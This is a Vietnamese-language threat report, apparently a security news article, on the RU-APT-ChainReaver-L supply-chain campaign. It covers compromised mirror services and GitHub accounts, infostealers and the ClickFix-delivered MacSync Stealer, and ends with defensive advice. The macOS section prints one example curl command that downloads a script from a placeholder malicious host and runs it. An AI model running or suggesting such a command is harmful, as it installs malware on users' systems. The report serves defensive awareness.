Một tấn công chuỗi cung ứng mạng phức tạp đã xuất hiện, nhắm mục tiêu vào người dùng trên nhiều hệ điều hành thông qua các trang web mirror và kho lưu trữ GitHub bị xâm nhập. Chiến dịch này được đặt tên là RU-APT-ChainReaver-L, đại diện cho một trong những cuộc tấn công chuỗi cung ứng tinh vi nhất được xác định gần đây, ảnh hưởng đồng thời đến các nền tảng Windows, macOS và iOS.

Chiến dịch RU-APT-ChainReaver-L sử dụng các kỹ thuật tiên tiến bao gồm ký mã với chứng chỉ hợp lệ, chuỗi chuyển hướng lừa đảo và phân phối phần mềm độc hại thông qua các dịch vụ đám mây hợp pháp. Điều này làm cho việc phát hiện trở nên cực kỳ khó khăn đối với các hệ thống an ninh truyền thống.

Tổng quan về chiến dịch tấn công chuỗi cung ứng RU-APT-ChainReaver-L

Cơ sở hạ tầng của chiến dịch này cho thấy quy mô và độ phức tạp đáng kể. Các tác nhân đe dọa đã xâm phạm hai dịch vụ mirror chia sẻ tệp lớn là Mirrored.to và Mirrorace.org. Các dịch vụ này được sử dụng rộng rãi bởi các trang web tải phần mềm trên toàn cầu.

Bằng cách tiêm mã độc vào các nền tảng này, kẻ tấn công đã biến cơ sở hạ tầng đáng tin cậy thành cơ chế phân phối mã độc infostealer. Khi người dùng cố gắng tải xuống tệp thông qua các dịch vụ bị xâm nhập, họ sẽ được chuyển hướng qua nhiều trang trung gian.

Các trang trung gian này được thiết kế để vượt qua khả năng phát hiện bảo mật, đồng thời duy trì vẻ ngoài hợp pháp. Mục tiêu cuối cùng là lây nhiễm và đánh cắp thông tin người dùng.

Phát hiện và quy mô của mối đe dọa mạng

Các nhà phân tích của GRAPH đã xác định chiến dịch này trong quá trình điều tra một lượng lớn thông tin đăng nhập người dùng xuất hiện trên các chợ đen dark web. Báo cáo của GRAPH đã truy tìm các tài khoản bị đánh cắp này đến một hoạt động lây nhiễm phối hợp đã hoạt động trong vài tháng.

Thông qua nền tảng Extended Detection and Response (XDR) và các hoạt động săn tìm mối đe dọa, các nhà nghiên cứu GRAPH đã phát hiện ra một cơ sở hạ tầng tấn công trải dài hơn 100 tên miền. Cơ sở hạ tầng này bao gồm các máy chủ điều khiển và ra lệnh (C2), các trang lây nhiễm và các trung gian chuyển hướng.

Các nhà điều hành chiến dịch liên tục cập nhật công cụ và cơ sở hạ tầng của chúng. Điều này bao gồm việc sửa đổi chữ ký phần mềm độc hại và phương pháp phân phối trong khoảng thời gian ngắn để né tránh các hệ thống phát hiện phần mềm diệt virus.

Kỹ thuật lây nhiễm theo nền tảng hệ điều hành

Phương pháp tấn công thay đổi tùy theo hệ điều hành của nạn nhân. Sự đa dạng này cho thấy mức độ thích nghi cao của chiến dịch tấn công chuỗi cung ứng.

Người dùng Windows

Người dùng Windows được chuyển hướng đến các dịch vụ lưu trữ đám mây như MediaFire và Dropbox. Tại đây, các tệp lưu trữ được bảo vệ bằng mật khẩu chứa phần mềm độc hại đã ký mã.

Phần mềm độc hại này có vẻ hợp pháp đối với phần mềm bảo mật. Ký mã hợp lệ giúp chúng vượt qua các kiểm tra ban đầu, làm tăng khả năng lây nhiễm.

Người dùng macOS

Nạn nhân macOS gặp phải các cuộc tấn công ClickFix, nơi các trang lừa đảo đánh lừa người dùng thực hiện thủ công các lệnh trong terminal. Các lệnh này tải xuống và cài đặt mã độc MacSync Stealer.

Mã độc này được thiết kế để thu thập thông tin nhạy cảm từ hệ thống macOS. Tham khảo thêm về các cuộc tấn công ClickFix để biết thêm chi tiết.

# Ví dụ lệnh lừa đảo (không thực thi trên hệ thống thật)
curl -o /tmp/install.sh http://malicious.cdn/macsync_installer.sh && chmod +x /tmp/install.sh && /tmp/install.sh

Người dùng iOS

Người dùng iOS được dẫn đến các ứng dụng VPN giả mạo trên Apple App Store. Các ứng dụng này sau đó khởi chạy các cuộc tấn công lừa đảo (phishing) chống lại thiết bị của họ. Các ứng dụng VPN giả mạo thường hứa hẹn các tính năng cao cấp nhưng thực chất lại là công cụ đánh cắp thông tin.

Xâm nhập kho lưu trữ GitHub

Việc chiến dịch sử dụng GitHub cho thấy sự hiểu biết tinh vi về các điểm mù của đội ngũ bảo mật. Các nhà nghiên cứu GRAPH ghi nhận rằng kẻ tấn công đã xâm nhập 50 tài khoản GitHub. Nhiều tài khoản trong số này đã được đăng ký nhiều năm trước với lịch sử hoạt động đáng tin cậy.

Các tài khoản này chủ yếu bị chiếm đoạt vào tháng 11 năm 2025 và được tái sử dụng để phân phối phần mềm bẻ khóa và công cụ kích hoạt. Chúng nhắm mục tiêu cụ thể vào những người dùng tìm kiếm phần mềm lậu, tạo ra một vector lây nhiễm hiệu quả cho mối đe dọa mạng này.

Khả năng của phần mềm độc hại

Các loại phần mềm độc hại được sử dụng trong chiến dịch tấn công chuỗi cung ứng này có khả năng thu thập dữ liệu rộng rãi từ các hệ thống bị lây nhiễm.

Mã độc Infostealer trên Windows

Phần mềm độc hại Windows hoạt động như một mã độc infostealer. Nó có khả năng chụp ảnh màn hình, trích xuất dữ liệu ví tiền điện tử, cơ sở dữ liệu ứng dụng nhắn tin, thông tin đăng nhập trình duyệt. Ngoài ra, nó còn sao chép các tệp từ các thư mục Desktop, Documents và Downloads.

Các nhà phân tích GRAPH lưu ý rằng các mẫu phần mềm độc hại này bao gồm chứng chỉ ký mã hợp lệ từ nhiều công ty. Điều này làm phức tạp đáng kể các nỗ lực phát hiện, vì chúng xuất hiện như các ứng dụng hợp pháp.

MacSync Stealer trên macOS

Mã độc MacSync Stealer trên macOS hoạt động không cần tệp (filelessly) trong bộ nhớ. Nó thu thập dữ liệu trình duyệt, ví tiền điện tử bao gồm Ledger và Trezor, khóa SSH và thông tin đăng nhập AWS.

Vì hoạt động trong bộ nhớ, MacSync Stealer khó bị phát hiện bởi các giải pháp an ninh truyền thống dựa trên chữ ký tệp. Điều này làm tăng thách thức trong việc phát hiện xâm nhập.

Chiến lược phòng thủ và giảm thiểu rủi ro

Các tổ chức cần triển khai các chiến lược phòng thủ toàn diện để chống lại các mối đe dọa mạng như RU-APT-ChainReaver-L. An toàn thông tin cho người dùng là yếu tố then chốt.

Giáo dục và nhận thức người dùng

Giáo dục người dùng là lớp bảo vệ quan trọng nhất, vì các lây nhiễm dựa vào kỹ thuật xã hội. Người dùng cần được đào tạo để nhận biết các dấu hiệu lừa đảo, các liên kết đáng ngờ và nguy cơ từ việc tải xuống phần mềm không chính thống.

Bảo vệ điểm cuối (Endpoint Protection)

Các đội ngũ an ninh nên triển khai bảo vệ điểm cuối nhiều lớp, bao gồm hệ thống EDR (Endpoint Detection and Response) có khả năng phát hiện hành vi tiến trình bất thường và các mẫu truy cập tệp đáng ngờ. EDR đóng vai trò quan trọng trong việc phát hiện xâm nhập ở giai đoạn đầu. Tìm hiểu thêm về nền tảng bảo vệ điểm cuối.

Giám sát mạng và phân tích lưu lượng

Giám sát mạng nên tập trung vào các kết nối đến các dịch vụ chia sẻ tệp và các tên miền mới đăng ký. Việc phân tích lưu lượng mạng có thể giúp xác định các hoạt động đáng ngờ hoặc các kết nối đến các máy chủ C2. Các công cụ giám sát mạng hiệu quả là cần thiết.

Kiểm soát truy cập và phân tích tệp

Các tổ chức nên hạn chế quyền truy cập internet trực tiếp cho hệ thống người dùng. Thay vào đó, định tuyến các lượt tải xuống thông qua các nền tảng phân tích tệp sử dụng phân tích tĩnh, phân tích động và học máy.

Biện pháp này giúp phát hiện và ngăn chặn các tệp độc hại trước khi chúng có thể tiếp cận điểm cuối. Việc áp dụng các giải pháp bảo mật mạng tiên tiến là yếu tố không thể thiếu trong chiến lược phòng thủ hiện đại.